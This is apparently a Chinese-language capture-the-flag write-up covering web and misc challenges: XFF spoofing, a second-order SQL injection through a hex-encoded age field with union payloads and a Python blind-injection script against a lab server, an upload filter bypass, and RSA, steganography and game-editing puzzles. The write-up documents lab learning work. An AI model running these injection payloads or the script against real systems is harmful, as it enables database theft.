一. Web
1. Are you in class
根据hint猜测应该是构造xff头,查看源代码发现注释
删掉注释符号,并构造192网段的xff头,提交得到flag
2. Buy flag
进入页面发现要注册,注册页面对age进行了限制,对是否是数字进行了判断,猜测使用了php中的is_numeric函数,用16进制绕过,绕过之后再次使用账号进行登录,发现主页出现了变化,
猜测应该是将age带入数据库查找年龄更小的用户,猜测此处应该存在二次注入,和强网杯的three hit思路相似。重新注册账号构造age为16进制的-1’ and 1=1#,返回的主页正常,而当age为16进制的-1’ and1=2#时返回主页异常。确定为二次注入。继续构造age为 -1’ and 1=2 union select selectgroup_concat(schema_name) from information_schema.schemata#
爆出数据库名-1’ and 1=2 union select group_concat(table_name) frominformation_schema.tables where table_schema='childhappy'# 爆出表名
-1’ and 1=2 union select group_concat(column_name) frominformation_schema.columns where table_schema=’childhappy’#爆出字段名
-1’ and 1=2 union select tsctf_fla9 from py_flag#得到flag
后来看了大佬的wp,使用脚本跑的盲注,附上脚本如下
#-*- coding: utf-8 -*-
import requests
import binascii
import random
url_register = "http://10.112.108.77:10002/register.php"
url_login = "http://10.112.108.77:10002/login.php"
url_index = "http://10.112.108.77:10002/index.php"
result = 'result:'
cookie = {
"PHPSESSID" : "" # 需填
}
for i in range(1, 65):
for j in range(32, 127):
username = "asdf{0}".format(str(random.randint(0,99999)))
# 表名 children,py_flag
# age = "-1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))={1}#".format(str(i), str(j))
# 列名 Id,tsctf_fla9
# age = "-1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='py_flag'),{0},1))={1}#".format(str(i), str(j))
# flag
age = "-1' and ascii(substr((select tsctf_fla9 from py_flag),{0},1))={1}#".format(str(i), str(j))
age = binascii.hexlify(bytes(age, 'utf8'))
age = "0x" + str(age, "utf8")
data1 = {
"user" : username,
"pass" : "123456",
"age" : age
}
data2 = {
"user": username,
"pass": "123456"
}
while True:
try:
resp1 = requests.post(url=url_register, data=data1, cookies=cookie, allow_redirects=False)
break
except Exception as e:
continue
while True:
try:
resp2 = requests.post(url=url_login, data=data2, cookies=cookie, allow_redirects=True)
resp3 = requests.get(url=url_index, cookies=cookie)
# print(resp3.text)
if "asdf,bbb,123456" in resp3.text:
result += chr(j)
print(result)
break
except Exception as e:
continue
3. upload easy
比赛的时候没有做出来,依然是比赛后看了大佬的wp得到的思路。注册完之后发现页面有一个注释
<!-- <li role="presentation"><a href="/hard_upload">上传</a></li>-->
删掉注释之后点击上传转到上传界面,试图上传一个py文件,提示名称错误,猜测可能过滤了py后缀,于是改成txt,提示mime类型错误,bp抓包将content-type删掉,上传显示attack defend,结合需要上传一个py文件,于是将txt第一行改成#!/usr/bin/python 这句话告诉操作系统执行这个脚本的时候,调用/usr/bin下的python解释器成功绕过后即可购买flag
二. MISC
1. 我需要治疗
Base64解码后发给微信公众号得到flag
1. 简单的RSA
下载bmp图片,winhex下打开,
发现有e=,n=,cipher的字样,结合题目RSA可以猜到这里就是隐写的数据。将数据提取出来转换成10进制,在factordb中对n进行分解得到p和q,网上找到一个python2脚本跑出d,脚本如下
# coding = utf-8
def computeD(fn, e):
(x, y, r) = extendedGCD(fn, e)
# y maybe < 0, so convert it
if y < 0:
return fn + y
return y
def extendedGCD(a, b):
# a*xi + b*yi = ri
if b == 0:
return (1, 0, a)
# a*x1 + b*y1 = a
x1 = 1
y1 = 0
# a*x2 + b*y2 = b
x2 = 0
y2 = 1
while b != 0:
q = a / b
# ri = r(i-2) % r(i-1)
r = a % b
a = b
b = r
# xi = x(i-2) - q*x(i-1)
x = x1 - q * x2
x1 = x2
x2 = x
# yi = y(i-2) - q*y(i-1)
y = y1 - q * y2
y1 = y2
y2 = y
return (x1, y1, a)
p = 863653476616376575308866344984576466644942572246900013156919
q = 965445304326998194798282228842484732438457170595999523426901
e = 4097
n = p * q
fn = (p - 1) * (q - 1)
d = computeD(fn, e)
print d
得到d之后python3中print(hex(pow(c,d,n)))得到一串16进制的数字,转成字符串得到flag
3.正常的魔塔
网上查找资料了解到应该是rpg makerxp制作的,下载rpg maker xp,新建一个工程保存后,将正常的魔塔中的Data文件夹复制到工程中替换掉原有的Data文件夹。然后再次进入工程进行查看,进入数据库进行修改保存文件之后替换回原来的data文件即可,之后只要进入游戏,通关并打败所有怪物即可得到flag。
4.zhiyu的短视频
下载swf文件,拖进ffdec中,根据hint,查看他的元件
发现第7个元件啥都没有很奇怪,点进去看一下,发现其中有一行很淡的字符串。导出png图片
得到字符串,根据hint,换用五笔输入法,得到这样一句话:一三五七八十腊,三十一天永不差。提取其中的数字,得到flag。